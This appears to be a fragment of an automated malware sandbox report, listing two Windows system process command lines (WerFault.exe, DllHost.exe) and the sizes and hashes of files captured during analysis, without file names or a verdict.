C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 596 -p 2708 -ip 27082⤵
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
13KB
MD5d4c9ffd9548c6724a9c2e703a596f0bd
SHA1cc891af58ef5c6b9410ad7ca083564552060b43b
SHA256d9c568a776910a6fe7ed3de9416f59f46439f10c884a3960d7b3cfb0c3e4f3c1
SHA5127f4c6b45c416dca92254350291adfedb0565ca6b0f587f5f6997916f60451f6d609157ef131e5c17595408b2b2a2f3a02653fd3f700a09e72ec0de428dfd7f49
-
Filesize
36KB
MD5520064e256af5a53da86c53b0b67cc29
SHA11fcc0bc95adb1b1d534fceb9b57252625a9e68bb
SHA2568c211c3b89401de03d307df435771859c671574aeb37b5ea28fd22769c751047
SHA5128d048a626a182ea5e5532af1db7dac2ab7d1e00ee758c610e6b821650d70619f33e6f1259dc7ed0c6188ab247e8141a9cde8d74f8dc46d431c704aa39817f68b
-
Filesize
13KB
MD5909cac38d0199c4169556c74369a3283
SHA1aee2bae9d0a1712638969a37786df6ae774d6b23
SHA25622fc9a1f7efdccd62bdd24d8ab042f928c098fe285aedc81111862713cba1656
SHA5124b15d242b25f472b8e393882f6d28bbfe3ab7a7fddf51ce3282b072f1233f8ebc98de44392e56cdc165198a23b8c02b1eceb40283c235e92797d66226004f0e6
-
Filesize
36KB
MD55c31b7faabe36408eb54d6feff32a442
SHA102a968e46267e970fdf4b5bccaee4f21968a69b1
SHA256c7b6321e70beab47b4ce25a4fb249243f232c70f3a5d3189e20dc57b59d3627b
SHA51247135383df08f1203439b6ae83575f54b0a8c20765ee21ce4979c27dedf1170f1943089b13d8fa000cf76c25b7cc6123e9c73cb555e358d0d8efa5e9f94fdd47
-
Filesize
3KB
MD517a17db79c19d4aa20da768f2f11e0f6
SHA178a73b83c002d4f3b51b69fc3cdf9cf0167fedc1
SHA256e9819d3ecd5796772aaeb07dc1c5da0563d3a1bf9422da03b0514b95ffad8289
SHA5127a450bd6e8767e16345db6745f162de8e948fb7b65dc5aa1b27e9c395f7657a5fc8a6becbe7e5d332c3c7480783474936e6d21f6421454d8fbe35f2f946043be
-
Filesize
152B
MD54c1a24fa898d2a98b540b20272c8e47b
SHA13218bff9ce95b52842fa1b8bd00be073177141ef
SHA256bbcc378fcbf64580e7a48b4e7ca9be57fa0a1f2e747f488325685bdb18d73a95
SHA512e61f196e7f1c9a5fe249abe9b11eea770fb2f4babc61f60b12c71f43e6fe9354cf14869daf46abc2c2655bce180252acd43c10562a2dcd31fa7d90d33253820e
-
Filesize
152B
MD5f1d2c7fd2ca29bb77a5da2d1847fbb92
SHA1840de2cf36c22ba10ac96f90890b6a12a56526c6
SHA25658d0f80310f4a84f687c5ce0adaa982eb42fe4480510399fa2ae975d40bb8bc5
SHA512ede1fafea2404f16948fe0b5ea5161ccee3ee6e40c55ff98c337eac981a6776b9c73dc030a5c59e4347aec91259f497539206e71949c33adcecbf2c846709e14
-
Filesize
168B
MD5a0bf17eae6a78539805f89251980b354
SHA10644bf4d3364da054c954c5515e082d3cbe237c1
SHA2567e86133e0c784cd40d79698a76bc152aadeeb147b3c74c4b4f6f93215161ed38
SHA512bc47e9944e05ba20c23e035bc4e4ccb0aa3836773a4fc186bb2176857d2b42b1a5aac31eea741911bb0d2ab1a22e39835014428a889ad4ed9629dfb0feee4b12
-
Filesize
809B
MD595e99f05a195b212dc646d128d49cd14
SHA10fba05fd74987bfdbd0c314159a004729fa71e37
SHA256a92ec79736713fa0589c35e2cf95e0443299b0bd287dbe6b7c7e6247bd09607a
SHA5122151dfcb43d1062073b93ebab1b9689588bfa4d1d941ecdc2b7931fdce05c9cbe4303da90f83197b5d20348f42b804a425fc2ebec57afb68117e6826ab0c160f
-
Filesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
Filesize
5KB
MD54e0fee7f2419a509aeb14e71b19ad2da
SHA116b53b11898f0d92e9b159b8c9e406df7e14920a
SHA256d50d3c0307a7ca26d79a9528d2cbe240be4d4378bb9c85d5364dfd74e258e311
SHA512b4ac155f1205037d2acb821fe11e1ec8044ce5494240cf8b71df88db3992be1ed234c9e4242679a4504355a1ea6e189ef0bec4046cea88b777d16b5ee3ce9711
-
Filesize
6KB
MD5adc93b8c3c45da6f8e5c9f5377ccb5ce
SHA15823e7d88a40ec4326b6b850a2c84466b9914fdf
SHA256974545f320e85e70c78c726cbc11f43e655bcf0398e8fdbe6f706c993fdd4a61
SHA512c4ae0c87a33db7044a1516e46031e4e400d7a571821e27ccee49b7402f6e97cf3d5ef51e48650ea33f17d8605fef2c366323eab6703195acab6fce62aa1bf227
-
Filesize
6KB
MD5bbb0a0b1fae2a5a4f60d5d3bac08bfdc
SHA1dd7cea5a568e71cd10793f2e643dd7578ea55dab
SHA2560dc42792308548a9c2c5ea6cbe1293d34be0a0dc4d324015718c83af1add36f4
SHA512a6c0f29d7a6f97af55f54e96fc5639cb891f275457c8d1fc2e1746f5864ba273cbca0d89583b196bace5a830490a310e4311a1d5bcf9dba80d08eea8c455badb
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
26KB
MD58235f98068f731038d8520df4727c625
SHA16ef1e3ca36d59de490e593ec195b632e8e09565d
SHA25698280dcf81e7ed7a29b2d383c12027481bf771aa6358012ee5ffcc8b3af21e38
SHA512d75d4b688898ee9c9ee07f7be6e9dafd0154518ac54042270666969dd15dbc3b7c8cf92997c510f42f20a5ad8270d5324dd8f2ef91666a9d6d0450d60bacfd83
-
Filesize
10KB
MD58ae60c797acd79bf7b8cbca1c6240ebc
SHA1dc00cc234c3d0a2c018d90fff05ba04aa8772294
SHA2563773cb83be3c692d50344e931207d64762855597353fa0fdb23cb7a82a58516e
SHA512a14c490d284f0bc732dc0dc189907c8c5bf416f3a61d72d97066576c3fd53bb359d4152f2f7d8f0e0f4869d9a9b8ca883c4522646514d454426dd7211396a99b
-
Filesize
10KB
MD59bb0c453957f5613607c4dd137b6cf69
SHA192f2fd5b7d96cab7858e198e7832f48256173907
SHA256e42e9b52f4deefc34233d4d07d7ba5f2287946fd9951bf8760147c59908299ba
SHA51205991afb078cd89eef842e2e7c6b77f193082235a44d11e0baea8678ba6c007b182ef7dbe392348027f9a8dcfadfc2973eddd00e917cdd24d83c77d7253731f5
-
Filesize
62KB
MD5e566632d8956997225be604d026c9b39
SHA194a9aade75fffc63ed71404b630eca41d3ce130e
SHA256b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0
SHA512f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd
-
Filesize
1KB
MD538d82e4dea1c1bf49bf8ec02767bf6c5
SHA1d047341a619d44c61fe80a9591f87a3806699dee
SHA256d753c949c37d2cdb08f9639a37f79c34c5c65eaebe6691bcae1b02d5585b6ee1
SHA512e30c6cf10376b148552fdb69ad994a0369d6c121dc193b4e11dbd7f13004461fe7e292aa4eb1edd0325a8dd52c86f159bb0835e9331ecc0cd050c83935a4a2a7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
5.5MB
MD515988ddd4ef8523823cb8670ec3c9fe8
SHA170509c9287dd990ab039c883a9b21ec76975aec7
SHA2560234a78acc9fd066d5e8ecc660497e92b88c8ccdb4f30527b992a56a8132a781
SHA512d815dd3da903409d9bfad9048af67c3d8595ea04a9d9ab79d41b741bd70f13f75854e5e732e3dd9457a9ad694f6b55618bd8daf7bc295e4bab5b48c74cdf309e
-
Filesize
56B
MD535459184ee3e133c26e295665d216777
SHA1d9c7a549fe331f8084069944a6a8079f54c01f97
SHA256de9de42e32765ef66a4d09d1dcd5e9675d52c3a803dcd91dc99b48db62523fe8
SHA512c788311fcb5398f951bff4e99262a48ba2c92043dd7c4ad52b3abdfd076d3ff07cc343e2a3840e91c56f7bd3f050ac6ce67a8718f85067bb2a1fe1f683c41048
-
Filesize
36KB
MD5b943a57bdf1bbd9c33ab0d33ff885983
SHA11cee65eea1ab27eae9108c081e18a50678bd5cdc
SHA256878df6f755578e2e79d0e6fd350f5b4430e0e42bb4bc8757afb97999bc405ba4
SHA512cb7253de88bd351f8bcb5dc0b5760d3d2875d39f601396a4250e06ead9e7edeffcd94fa23f392833f450c983a246952f2bad3a40f84aff2adc0f7d0eb408d03c
-
Filesize
7.3MB
MD51bec1098946595a03fa067a3ef7ce292
SHA189cfb4a2f8800f1b944d906d959639907672317d
SHA256a8f184a333fb89f41ddca323472463b4ee2cbed63d26d105823300148e2015cb
SHA512dc7e73ed353d50b73a0eb6f1d955812a29fc5e05df300487d1eda49cc78e6748929a17cd59b58148f7e8696fd0fdfd21e8269af6788f1037bda6d8ddf30c6082
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
144KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
64KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
64KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
64KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
2.0MB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
756KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
2.0MB
-
Filesize
3.6MB
-
Filesize
756KB
-
Filesize
4.3MB
-
Filesize
232KB
-
Filesize
280KB
-
Filesize
136KB
-
Filesize
7.5MB
-
Filesize
320KB
-
Filesize
712KB
-
Filesize
1.8MB
-
Filesize
56KB